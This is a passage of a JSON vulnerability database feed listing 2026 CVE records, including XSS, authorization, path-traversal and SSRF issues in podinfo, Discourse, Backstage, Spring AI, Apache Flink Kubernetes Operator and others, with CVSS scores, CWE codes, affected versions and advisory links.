Advisory"]}]}},{"cve":{"id":"CVE-2026-43644","sourceIdentifier":"disclosure@vulncheck.com","published":"2026-05-14T13:16:18.770","lastModified":"2026-06-01T13:48:57.850","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"podinfo through 6.11.2 contains a reflected cross-site scripting vulnerability in the /echo and /api/echo endpoints where the echoHandler writes request body content directly to the response without setting explicit Content-Type or X-Content-Type-Options headers. Attackers can craft cross-origin HTML pages with auto-submitting forms containing script payloads in the request body, which are served as text/html due to Go's content type detection, allowing the reflected script to execute in the podinfo origin context when victims visit the attacker's page."}],"metrics":{"cvssMetricV40":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"disclosure@vulncheck.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N","baseScore":5.4,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.5},{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"disclosure@vulncheck.com","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:stefanprodan:podinfo:*:*:*:*:*:kubernetes:*:*","versionEndIncluding":"6.11.12","matchCriteriaId":"27CA7FB3-D2D7-4E97-819F-2A044609E990"}]}]}],"references":[{"url":"https://github.com/Niccolo10/Security-Advisories/blob/main/CVE-2026-43644/cve-2026-43644.md","source":"disclosure@vulncheck.com","tags":["Exploit","Mitigation","Third Party Advisory"]},{"url":"https://github.com/stefanprodan/podinfo/issues/474","source":"disclosure@vulncheck.com","tags":["Issue Tracking"]},{"url":"https://www.vulncheck.com/advisories/podinfo-reflected-xss-via-echo-endpoint","source":"disclosure@vulncheck.com","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-21730","sourceIdentifier":"cvd@cert.pl","published":"2026-05-14T15:16:44.577","lastModified":"2026-06-01T13:51:17.240","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Verba is affected by a Stored Cross-Site Scripting (XSS) vulnerability within its login logging mechanism. When an unauthenticated remote attacker attempts to log in using an incorrect username and password combination, the supplied username value is recorded in the application logs. Due to lack of input sanitization, an attacker can inject a malicious XSS payload into the username field.\nThis payload will be executed in the context of the administrator’s browser when the admin accesses the web application's log viewer.\n\nThe vendor was notified early about this vulnerability, but didn't respond to our messages. This issue was fixed in version 10.0.6"}],"metrics":{"cvssMetricV40":[{"source":"cvd@cert.pl","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"PASSIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cvd@cert.pl","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:verint:verba_collaboration_compliance_and_quality_management_platform:*:*:*:*:*:*:*:*","versionEndExcluding":"10.0.6","matchCriteriaId":"C8BC74B1-9908-4233-AF5E-5C13301970E5"}]}]}],"references":[{"url":"https://cert.pl/en/posts/2026/05/CVE-2026-21730","source":"cvd@cert.pl","tags":["Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-44374","sourceIdentifier":"security-advisories@github.com","published":"2026-05-14T15:16:48.250","lastModified":"2026-06-01T13:36:21.143","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Backstage is an open framework for building developer portals. Prior to 0.6.11, the unprocessed entities read endpoints in @backstage/plugin-catalog-backend-module-unprocessed do not enforce permission authorization checks. Any authenticated user can access unprocessed entity records regardless of ownership. This is an information disclosure vulnerability affecting Backstage installations using this module. This is patched in @backstage/plugin-catalog-backend-module-unprocessed version 0.6.11, @backstage/plugin-catalog-unprocessed-entities-common version 0.0.15 and @backstage/plugin-catalog-unprocessed-entities version 0.2.30."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-863"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-backend-module-unprocessed:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.6.11","matchCriteriaId":"109B2D64-CFBC-4239-AF3A-1BF91F63B6F5"},{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-unprocessed-entities:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.2.30","matchCriteriaId":"62811CDB-F9EE-48A5-BE85-0A298D696634"},{"vulnerable":true,"criteria":"cpe:2.3:a:linuxfoundation:backstage\\/plugin-catalog-unprocessed-entities-common:*:*:*:*:*:node.js:*:*","versionEndExcluding":"0.0.15","matchCriteriaId":"D2969930-3D83-4C7F-9B4D-AC193282F7E3"}]}]}],"references":[{"url":"https://github.com/backstage/backstage/security/advisories/GHSA-p7g9-rp3g-mgfg","source":"security-advisories@github.com","tags":["Vendor Advisory","Mitigation"]}]}},{"cve":{"id":"CVE-2026-32244","sourceIdentifier":"security-advisories@github.com","published":"2026-05-19T00:16:37.100","lastModified":"2026-06-01T13:57:19.007","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, outdated cached AI summaries can leak removed content to anonymous and unprivileged users who cannot regenerate summaries. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1. To work around this issue, restrict summary generation by tightening the allowed groups on the summarization Personas."}],"metrics":{"cvssMetricV31":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N","baseScore":5.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":3.9,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-200"},{"lang":"en","value":"CWE-524"},{"lang":"en","value":"CWE-672"}]},{"source":"nvd@nist.gov","type":"Primary","description":[{"lang":"en","value":"NVD-CWE-noinfo"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.1.0","versionEndExcluding":"2026.1.4","matchCriteriaId":"8859700A-C256-49F8-A921-933CF3A66517"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.3.0","versionEndExcluding":"2026.3.1","matchCriteriaId":"CA619035-F6AF-4501-B331-AE685DE74BCA"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.4.0","versionEndExcluding":"2026.4.1","matchCriteriaId":"09919919-C8A3-4AA6-AF85-45BD0FCA93F6"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:2026.5.0:*:*:*:latest:*:*:*","matchCriteriaId":"8AD4BB38-1D03-4ECD-BFAB-900D57689A31"}]}]}],"references":[{"url":"https://github.com/discourse/discourse/security/advisories/GHSA-hjmg-2mww-vfvx","source":"security-advisories@github.com","tags":["Mitigation","Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-33514","sourceIdentifier":"security-advisories@github.com","published":"2026-05-19T02:16:16.210","lastModified":"2026-06-01T14:00:01.853","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Discourse is an open-source discussion platform. In versions prior to 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1, an authenticated user on a Discourse instance with the form templates feature enabled can read the name and structured content of form templates that are intended exclusively for categories they are not authorized to access. Impact is limited to disclosure of site configuration metadata. This issue has been fixed in versions 2026.1.4, 2026.3.1, 2026.4.1 and 2026.5.0-latest.1."}],"metrics":{"cvssMetricV40":[{"source":"security-advisories@github.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.0,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"PRESENT","privilegesRequired":"LOW","userInteraction":"NONE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N","baseScore":4.3,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"LOW","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":1.4}]},"weaknesses":[{"source":"security-advisories@github.com","type":"Primary","description":[{"lang":"en","value":"CWE-862"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.1.0","versionEndExcluding":"2026.1.4","matchCriteriaId":"8859700A-C256-49F8-A921-933CF3A66517"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.3.0","versionEndExcluding":"2026.3.1","matchCriteriaId":"CA619035-F6AF-4501-B331-AE685DE74BCA"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:*:*:*:*:latest:*:*:*","versionStartIncluding":"2026.4.0","versionEndExcluding":"2026.4.1","matchCriteriaId":"09919919-C8A3-4AA6-AF85-45BD0FCA93F6"},{"vulnerable":true,"criteria":"cpe:2.3:a:discourse:discourse:2026.5.0:*:*:*:latest:*:*:*","matchCriteriaId":"8AD4BB38-1D03-4ECD-BFAB-900D57689A31"}]}]}],"references":[{"url":"https://github.com/discourse/discourse/commit/ae5c9570fb918442c4d96abc83c1e7e169909b02","source":"security-advisories@github.com","tags":["Patch"]},{"url":"https://github.com/discourse/discourse/security/advisories/GHSA-w6g7-p2p9-2m5h","source":"security-advisories@github.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-0393","sourceIdentifier":"info@cert.vde.com","published":"2026-05-21T12:16:19.810","lastModified":"2026-06-01T14:01:00.860","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session."}],"metrics":{"cvssMetricV40":[{"source":"info@cert.vde.com","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":6.9,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"LOW","userInteraction":"PASSIVE","vulnConfidentialityImpact":"HIGH","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"NONE","subIntegrityImpact":"NONE","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"info@cert.vde.com","type":"Primary","description":[{"lang":"en","value":"CWE-522"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:codesys:visualization:*:*:*:*:*:*:*:*","versionStartIncluding":"1.0.0.0","versionEndExcluding":"4.10.0.0","matchCriteriaId":"2500F865-A86C-4FA7-852F-8663004A8894"}]}]}],"references":[{"url":"https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json","source":"info@cert.vde.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-6841","sourceIdentifier":"cvd@cert.pl","published":"2026-05-21T13:16:20.273","lastModified":"2026-06-01T14:02:21.180","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the \"Page\" parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim’s browser.\n\nThis vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2."}],"metrics":{"cvssMetricV40":[{"source":"cvd@cert.pl","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","baseScore":5.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"ACTIVE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"NONE","vulnAvailabilityImpact":"NONE","subConfidentialityImpact":"LOW","subIntegrityImpact":"LOW","subAvailabilityImpact":"NONE","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"NOT_DEFINED","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N","baseScore":6.1,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"NONE","userInteraction":"REQUIRED","scope":"CHANGED","confidentialityImpact":"LOW","integrityImpact":"LOW","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":2.7}]},"weaknesses":[{"source":"cvd@cert.pl","type":"Primary","description":[{"lang":"en","value":"CWE-79"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:bestpractical:request_tracker:*:*:*:*:*:*:*:*","versionStartIncluding":"5.0.4","versionEndExcluding":"5.0.10","matchCriteriaId":"B391CF4D-CACE-4C0D-8717-2D3E73AFF79C"},{"vulnerable":true,"criteria":"cpe:2.3:a:bestpractical:request_tracker:*:*:*:*:*:*:*:*","versionStartIncluding":"6.0.0","versionEndExcluding":"6.0.3","matchCriteriaId":"C106711D-0178-4681-BA2F-081792A36275"}]}]}],"references":[{"url":"https://cert.pl/en/posts/2026/05/CVE-2026-6841","source":"cvd@cert.pl","tags":["Third Party Advisory"]},{"url":"https://docs.bestpractical.com/release-notes/rt/5.0.10","source":"cvd@cert.pl","tags":["Release Notes"]},{"url":"https://docs.bestpractical.com/release-notes/rt/6.0.3","source":"cvd@cert.pl","tags":["Release Notes"]},{"url":"https://requesttracker.com/request-tracker/","source":"cvd@cert.pl","tags":["Product"]}]}},{"cve":{"id":"CVE-2026-41863","sourceIdentifier":"security@vmware.com","published":"2026-05-25T07:16:16.377","lastModified":"2026-06-01T14:22:15.893","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Spring AI's support for Anthropic's Skills API used LLM-influenced filenames unsanitized in Path.resolve before writing files to disk. This could allow a malicious user to write files outside the intended target directory, including restricted directories.\n\nAffected versions:\nSpring AI: 1.1.0 through 1.1.x"}],"metrics":{"cvssMetricV31":[{"source":"security@vmware.com","type":"Secondary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"NONE","integrityImpact":"HIGH","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@vmware.com","type":"Secondary","description":[{"lang":"en","value":"CWE-22"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:vmware:spring_ai:*:*:*:*:*:*:*:*","versionStartIncluding":"1.1.0","versionEndExcluding":"1.1.7","matchCriteriaId":"79B32FFF-1F8A-4904-BFC7-C41C07FFC575"}]}]}],"references":[{"url":"https://spring.io/security/cve-2026-41863","source":"security@vmware.com","tags":["Vendor Advisory"]}]}},{"cve":{"id":"CVE-2026-40564","sourceIdentifier":"security@apache.org","published":"2026-05-26T16:16:24.590","lastModified":"2026-06-01T14:08:31.437","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"Files or Directories Accessible to External Parties, Server-Side Request Forgery (SSRF) vulnerability in Apache Flink Kubernetes Operator.\n\nThe FlinkSessionJob jarURI is currently not validated so that it points to user-owned files or addresses.  This lets a user with CR create permissions read files from the operator pod's filesystem and pull content from any backing store reachable through Flink's pluggable filesystem layer and access them through the submitted Flink job. Furthermore for fetching from http/https addresses there is currently no allowlist on the URI scheme, no host check, no IP-range restriction, and no protection against pointing the URI at internal or link-local addresses.This issue affects Apache Flink Kubernetes Operator: from 1.3.0 before 1.15.0.\n\nUsers are recommended to upgrade to version 1.15.0, which fixes the issue."}],"metrics":{"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssData":{"version":"3.1","vectorString":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N","baseScore":6.5,"baseSeverity":"MEDIUM","attackVector":"NETWORK","attackComplexity":"LOW","privilegesRequired":"LOW","userInteraction":"NONE","scope":"UNCHANGED","confidentialityImpact":"HIGH","integrityImpact":"NONE","availabilityImpact":"NONE"},"exploitabilityScore":2.8,"impactScore":3.6}]},"weaknesses":[{"source":"security@apache.org","type":"Secondary","description":[{"lang":"en","value":"CWE-552"},{"lang":"en","value":"CWE-918"}]}],"configurations":[{"nodes":[{"operator":"OR","negate":false,"cpeMatch":[{"vulnerable":true,"criteria":"cpe:2.3:a:apache:flink_kubernetes_operator:*:*:*:*:*:*:*:*","versionStartIncluding":"1.3.0","versionEndExcluding":"1.15.0","matchCriteriaId":"FDD73EA9-97EA-48BD-A4A4-4A6CFA3C3AD5"}]}]}],"references":[{"url":"https://lists.apache.org/thread/jvxs2kh2o60sl7qkl5nss4r5phzfl4cz","source":"security@apache.org","tags":["Mailing List"]},{"url":"http://www.openwall.com/lists/oss-security/2026/05/26/6","source":"af854a3a-2127-422b-91ae-364da2661108","tags":["Mailing List","Third Party Advisory"]}]}},{"cve":{"id":"CVE-2026-48906","sourceIdentifier":"security@joomla.org","published":"2026-05-27T11:16:24.713","lastModified":"2026-06-01T14:33:36.133","vulnStatus":"Analyzed","cveTags":[],"descriptions":[{"lang":"en","value":"The vulnerability in the Tassos Framework Plugin allows users to delete arbitrary files on the affected sites."}],"metrics":{"cvssMetricV40":[{"source":"security@joomla.org","type":"Secondary","cvssData":{"version":"4.0","vectorString":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:Y/R:X/V:X/RE:X/U:X","baseScore":9.3,"baseSeverity":"CRITICAL","attackVector":"NETWORK","attackComplexity":"LOW","attackRequirements":"NONE","privilegesRequired":"NONE","userInteraction":"NONE","vulnConfidentialityImpact":"NONE","vulnIntegrityImpact":"HIGH","vulnAvailabilityImpact":"HIGH","subConfidentialityImpact":"NONE","subIntegrityImpact":"HIGH","subAvailabilityImpact":"HIGH","exploitMaturity":"NOT_DEFINED","confidentialityRequirement":"NOT_DEFINED","integrityRequirement":"NOT_DEFINED","availabilityRequirement":"NOT_DEFINED","modifiedAttackVector":"NOT_DEFINED","modifiedAttackComplexity":"NOT_DEFINED","modifiedAttackRequirements":"NOT_DEFINED","modifiedPrivilegesRequired":"NOT_DEFINED","modifiedUserInteraction":"NOT_DEFINED","modifiedVulnConfidentialityImpact":"NOT_DEFINED","modifiedVulnIntegrityImpact":"NOT_DEFINED","modifiedVulnAvailabilityImpact":"NOT_DEFINED","modifiedSubConfidentialityImpact":"NOT_DEFINED","modifiedSubIntegrityImpact":"NOT_DEFINED","modifiedSubAvailabilityImpact":"NOT_DEFINED","Safety":"NOT_DEFINED","Automatable":"YES","Recovery":"NOT_DEFINED","valueDensity":"NOT_DEFINED","vulnerabilityResponseEffort":"NOT_DEFINED","providerUrgency":"NOT_DEFINED"}}],"cvssMetricV31":[{"source":"nvd@nist.gov","type":"Primary","cvssD